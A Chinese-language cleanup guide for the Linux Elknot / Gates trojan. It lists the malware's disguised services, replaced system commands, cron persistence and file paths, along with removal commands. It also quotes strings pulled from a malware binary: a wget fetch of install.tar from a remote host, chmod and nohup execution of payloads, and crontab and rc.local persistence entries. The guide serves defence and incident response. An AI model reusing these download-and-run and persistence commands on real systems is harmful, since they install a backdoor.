Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理
可用clamAV扫描, 显示是Linux Unix.Trojan.Elknot木马病毒(Linux.BackDoor.Gates.5),
这个木马,伪装和自我保能力很强,要想彻底清除必须要认识到该木马病毒的特性
1、关闭防火墙
2、伪装系统服务
3、伪装系统命令
4、定时自动启动
认识到这些后采取相应的在动作
1、关闭防活墙
mv /etc/init.d/iptables iptables2
2、伪装系统服务
伪装的系统服务有
DbSecuritySpt
selinux
taskgrm-
可先把这些服务停止,
service taskgrm- stop
chkconfig --del taskgrm-
rm /etc/init.d/taskgrm-
...
3、伪装系统命令
伪装的系统命令有:
ps
netstat
lsof
bsd-port
要把这些文件删除掉,从别的系统里再copy过来
4、定时自动启动
木马病毒是修改了/etc/crontab文件
木最后还需要清除木马病毒文件及进程
/bin/install.rar
/root/xl123
/bin/socket
/bin/install.tar
/bin/.sshd
cnet2
mysql515
socket
taskgrm-
xl123
我是通过对install.rar的分析来弄清楚这个木马病毒的,
解压install.rar,里面的文件都是病毒文件,
用vim 打开mysql515从其中的一些片断可弄清该病毒是如何工作的
^@service iptables stop^
@/bin/install.tar^@wget -c -P /bin http://%s/install.tar^@^@^
@tar -xf /bin/install.tar -C /bin/^@%s/xl123^@/root/xl123^@chmod 0777
/bin/mysql515^@chmod 0777 /bin/socket^@chmod 0777 /bin/cnet2^@chmod 0755
/root/xl123^@rm -rf /root/xl123h /usr/bin/%s^@nohup /bin/socket > /dev/null 2>&1
&^@/bin/rc.local^@%s/rc.local^@/etc/rc.local^@%s/crontab^@/etc/crontab^@%s/%s^@a^@cd %s
chmod 777 %s/%s
./%s^@chmod 777 %s/%s^@a+^@*/55 * * * * root %s/%s
^@/etc/init.d/taskgrm-
^@/bin/taskgrm-
^@^@^@chmod 777 /etc/init.d/taskgrm-
^@^@ln -s /etc/init.d/taskgrm- /etc/rc.d/rc5.d/taskgrm-
^@chmod 777 /etc/rc.d/rc5.d/taskgrm-
^@chkconfig --add taskgrm-^@mysql515^@/bin^@cngamemafix.sh^@r^@the file1 can not open %s
^@w^@^@^@^@the new file can not open %s
其中有关闭防火墙壁, 下载病毒程序install.tar,添加自启动服务,定进运行等,
通过这些线索可帮助我们去清理该病毒